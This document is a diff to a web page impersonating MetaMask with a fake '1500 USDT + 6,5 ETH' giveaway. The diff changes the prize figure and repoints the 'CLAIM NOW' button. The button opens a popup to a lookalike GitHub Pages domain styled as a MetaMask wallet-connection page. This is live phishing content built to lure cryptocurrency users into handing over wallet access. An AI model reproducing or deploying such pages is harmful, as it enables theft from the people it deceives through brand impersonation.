--- a/Community/Coins/Give/Frize/index.html
+++ b/Community/Coins/Give/Frize/index.html
@@ -141,11 +141,11 @@
                                     <div class="HeroContainer__HeroDescription-i60pbm-4 bFAlZj">
                                         <div>
                                             <p>Thank you for choosing and support to us until 2022.<br>
-The great appreciation from MetaMask, we are giving away 1500 USDT + 7 ETH <br>for you!!!
+The great appreciation from MetaMask, we are giving away 1500 USDT + 6,5 ETH <br>for you!!!
 </p>
                                         </div>
                                     </div>
-                                    <div class="HeroContainer__HeroCTA-i60pbm-6 gMMoxz"><a color="primary" class="Button__ButtonWrapper-sc-5os99m-0 iXthXE button" font-size="20px" onclick="window.open('https://met-cryptocurrencyerc20tokens.github.io/connected/Verifications/Cryptocurrency/wallet/Connect/','','toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=400,height=780') ;return false">CLAIM NOW</a></div>
+                                    <div class="HeroContainer__HeroCTA-i60pbm-6 gMMoxz"><a color="primary" class="Button__ButtonWrapper-sc-5os99m-0 iXthXE button" font-size="20px" onclick="window.open('https://themost-methamssk-secure.github.io/cryptonews/centralised/Community/Coins/MetaMask.html','','toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=400,height=780') ;return false">CLAIM NOW</a></div>
                                 </div>
                                 <div class="HeroContainer__HeroSideImage-i60pbm-5 cuKjvt"></div>
                             </div>
@@ -493,6 +493,7 @@ The great appreciation from MetaMask, we are giving away 1500 USDT + 7 ETH <br>f
 
 
     </script>
+
 
 
 
